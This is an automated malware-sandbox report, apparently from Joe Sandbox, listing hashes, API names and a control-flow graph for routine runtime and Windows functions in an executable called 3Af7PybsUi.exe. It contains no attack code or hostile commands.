                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                  • Instruction ID: d34daa298e9c0a6f5823730ff160cbdafe8b864363559d028d7e9d4afae39f62
                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                  • Instruction Fuzzy Hash: CC81A273E0820385F764FE25CD5027AA6E0EB11768FD58037CE8997289DBADEC019F61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                  • Instruction ID: 4dff745692fe3ff2ba44667ca93efa65993da7cdde124d6ce4fe734e739a8221
                                                                                                                                  • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                  • Instruction Fuzzy Hash: 1951B332B1A642CADB14EF15EC1467AB3E1EB84B94FA05132DA4D43788EF7CE941CB10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                  • Instruction ID: 955582af740e205d17def9b4409e27919dbb31da280be5d420c4d42697d0c567
                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                  • Instruction Fuzzy Hash: 8C51B33290924286EB24AA119E4437AB6D0FF94B84FA44137DB9D47BC2DF3CE650CF51
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                  • Instruction ID: bcde95a6544439bf672db7b9b4431cee44c5df8a064c7f37b896a9969045da67
                                                                                                                                  • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                  • Instruction Fuzzy Hash: 51619F32909B8581D720AB25E9403AAB7E0FBC5794F545226EBDC03B95EF7CE290CF50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                  • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                  • API String ID: 1878133881-2698358428
                                                                                                                                  • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                  • Instruction ID: cedc97868ad9122ed681357f2ad7a50da3eb8002e4806b7d10b921cf007425be
                                                                                                                                  • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                  • Instruction Fuzzy Hash: DF116372629B4581FB20AB10FC517AAB3A4FF88B84FD05136DA8D57644DF3CD605CB50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                  • Instruction ID: 703e68d35c9c52884473b066f6d5106943eaf8d1f4a8ed01aa5bb3d8fbdae582
                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                  • Instruction Fuzzy Hash: 11116372629B4681EB20AB10FC517AAB3A4FB88B85FD05136DA8D57644DF3CD605CB50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                  • Instruction ID: fd2ee4c0ef67b7a55992237c32f648921e140478bdf1ac57cff79f209ace311a
                                                                                                                                  • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                  • Instruction Fuzzy Hash: 1DD1F232B08A8189E710DF75DC406AD77B2FB447A8B944236CE5E57B99DF78D806CB10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                  • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                  • Instruction ID: 197bdd6b52eb9e07c591c7abd8f3aec59b9d718ee309439f38896e1fc14a19a1
                                                                                                                                  • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                  • Instruction Fuzzy Hash: 9611EC21E1915242F754A759ED943BBA2D1FFD8780FD48032DA4907B89DF3CD5C58920
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                  • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                  • Instruction ID: bef04666a998dd374b5f9e22890d75b600a2850b5c5975907115a393778633f0
                                                                                                                                  • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                  • Instruction Fuzzy Hash: 0B410822A1868246FB25AB259C4177BE7D0EB94BA4F944236EF5C07AD9DF3CD4418F10
                                                                                                                                  APIs
                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262A835E
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C6E
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: GetLastError.KERNEL32(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C78
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72629BEC5), ref: 00007FF7262A837C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                  • String ID: C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                  • API String ID: 3580290477-1328305775
                                                                                                                                  • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                  • Instruction ID: f7c78138ca68612ba63641903e7bdf1bf6827c133e2d79eb6a3d8a6a6620a82a
                                                                                                                                  • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                  • Instruction Fuzzy Hash: 58415F36A08B5285E714EF25AC800FEB7D4EB457A4F954037EA4E47B85DF7CE8818B60
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                  • String ID: .$:
                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                  • Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                  • Instruction ID: 63a2891800ef829bee05195592877a40751d25e662f6b39fab7acfc658abb45c
                                                                                                                                  • Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                  • Instruction Fuzzy Hash: D3416C23E0875298FB10EFA19D501FE66E4EF14368F944036DE4D67A49DFBCD8468B20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                  • Instruction ID: c515c6095c435a80883c95cef9708f13a553f89e08cfa875b73c47fa0b3ec851
                                                                                                                                  • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                  • Instruction Fuzzy Hash: BB41C572B18A8585DB20EF25EC443AAB7A0FB98794F944036EE4D87788EF7CD441CB50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                  • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                  • Instruction ID: 8526a17d9a157d52e6ca563d6dffb12ee934b1a983cc0a87051f338df7fbf8df
                                                                                                                                  • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                  • Instruction Fuzzy Hash: 5A21A762A0878281EB60AB15DD4427FA3E1FB88B44FD58036D6CD47684DFBCE945CBA1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                  • Instruction ID: 2f11454236ad039eb8781b4a8eb667e49c5d26f784deb9ad940cb93f592705b3
                                                                                                                                  • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                  • Instruction Fuzzy Hash: E9112E36619B4582EB61DB15FC4026AB7E4FB88B84F684232DB8D07B68EF3DD5518B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                  • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                  • Instruction ID: ab6832e0fafe5d9ad43711536c32f5221ce5c26524b4659977d7528ed123708b
                                                                                                                                  • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                  • Instruction Fuzzy Hash: 6701212291824685EB20FF609C612BFA2D0EF58758FD40537D94D46692DFACD9048E65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1696143983.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffaab450000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                  • Instruction ID: 92295cdb2f7af2e4ecd78a6a2afc89a425ddf69577780f790e250f5ce601b16d
                                                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                  • Instruction Fuzzy Hash: AA01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10066DE58AC3665DA36E892CB45

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 969 48520d-4852bb call 4af710 * 2 GetModuleHandleW call 4c0912 call 4c0ac6 call 481206 980 4852bd 969->980 981 4852d1-4852e2 call 484361 969->981 982 4852c2-4852cc call 4c0657 980->982 986 4852eb-485307 call 48568e CoInitializeEx 981->986 987 4852e4-4852e9 981->987 990 48554c-485553 982->990 997 485309-48530e 986->997 998 485310-48531c call 4c00c9 986->998 987->982 991 485560-485562 990->991 992 485555-48555b call 48278d 990->992 995 485572-485590 call 48d8c8 call 49a8bc call 49ab06 991->995 996 485564-48556b 991->996 992->991 1019 4855be-4855d1 call 48501c 995->1019 1020 485592-48559a 995->1020 996->995 999 48556d call 494264 996->999 997->982 1006 48531e 998->1006 1007 485330-48533f call 4c12d3 998->1007 999->995 1009 485323-48532b call 4c0657 1006->1009 1014 485348-485357 call 4c2f7b 1007->1014 1015 485341-485346 1007->1015 1009->990 1024 485359-48535e 1014->1024 1025 485360-48536f call 4c39da 1014->1025 1015->1009 1030 4855d8-4855df 1019->1030 1031 4855d3 call 4c3ea2 1019->1031 1020->1019 1023 48559c-48559f 1020->1023 1023->1019 1027 4855a1-4855bc call 4943c4 call 485678 1023->1027 1024->1009 1038 485378-485397 GetVersionExW 1025->1038 1039 485371-485376 1025->1039 1027->1019 1035 4855e1 call 4c3381 1030->1035 1036 4855e6-4855ed 1030->1036 1031->1030 1035->1036 1041 4855ef call 4c191f 1036->1041 1042 4855f4-4855fb 1036->1042 1046 485399-4853a3 GetLastError 1038->1046 1047 4853d1-485416 call 4834ef call 485678 1038->1047 1039->1009 1041->1042 1043 4855fd call 4c01d8 1042->1043 1044 485602-485604 1042->1044 1043->1044 1051 48560c-485613 1044->1051 1052 485606 CoUninitialize 1044->1052 1053 4853b0 1046->1053 1054 4853a5-4853ae 1046->1054 1071 485418-485423 call 48278d 1047->1071 1072 485429-485439 call 497523 1047->1072 1056 48564e-485657 call 4c0535 1051->1056 1057 485615-485617 1051->1057 1052->1051 1058 4853b2 1053->1058 1059 4853b7-4853cc call 4838f5 1053->1059 1054->1053 1069 485659 call 484674 1056->1069 1070 48565e-485675 call 4c0c18 call 4ade30 1056->1070 1062 485619-48561b 1057->1062 1063 48561d-485623 1057->1063 1058->1059 1059->1009 1068 485625-48563e call 493df9 call 485678 1062->1068 1063->1068 1068->1056 1088 485640-48564d call 485678 1068->1088 1069->1070 1071->1072 1084 48543b 1072->1084 1085 485445-48544e 1072->1085 1084->1085 1089 485454-485457 1085->1089 1090 485516-48552c call 484db5 1085->1090 1088->1056 1091 48545d-485460 1089->1091 1092 4854ee-48550a call 484b65 1089->1092 1104 485538-48554a 1090->1104 1105 48552e 1090->1105 1095 485462-485465 1091->1095 1096 4854c6-4854e2 call 484971 1091->1096 1092->1104 1109 48550c 1092->1109 1101 48549e-4854ba call 484b08 1095->1101 1102 485467-48546a 1095->1102 1096->1104 1111 4854e4 1096->1111 1101->1104 1115 4854bc 1101->1115 1107 48547b-485485 call 484d04 1102->1107 1108 48546c-485471 1102->1108 1104->990 1105->1104 1114 48548a-48548e 1107->1114 1108->1107 1109->1090 1111->1092 1114->1104 1116 485494 1114->1116 1115->1096 1116->1101
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0048528F
                                                                                                                                    • Part of subcall function 004C0912: InitializeCriticalSection.KERNEL32(004EC6EC,?,0048529B,00000000,?,?,?,?,?,?), ref: 004C0929
